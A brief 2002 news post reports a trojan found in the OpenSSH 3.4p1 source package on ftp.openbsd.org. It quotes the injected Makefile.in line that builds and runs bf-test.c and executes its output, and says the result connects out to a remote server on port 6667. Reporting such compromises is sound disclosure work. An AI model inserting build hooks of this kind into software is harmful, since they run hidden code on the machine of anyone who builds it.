Trojan found in OpenSSH 3.4p1
Posted on: 08/01/2002 08:59 AM
It seems like that the OpenSSH package on ftp.openbsd.org was trojaned. Thanks Palos.
"The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out
bf-test.c is nothing more than a wrapper which generates a
shell-script which compiles itself and tries to connect to an
server running on 220.127.116.11:6667 (web.snsonline.net)."Read more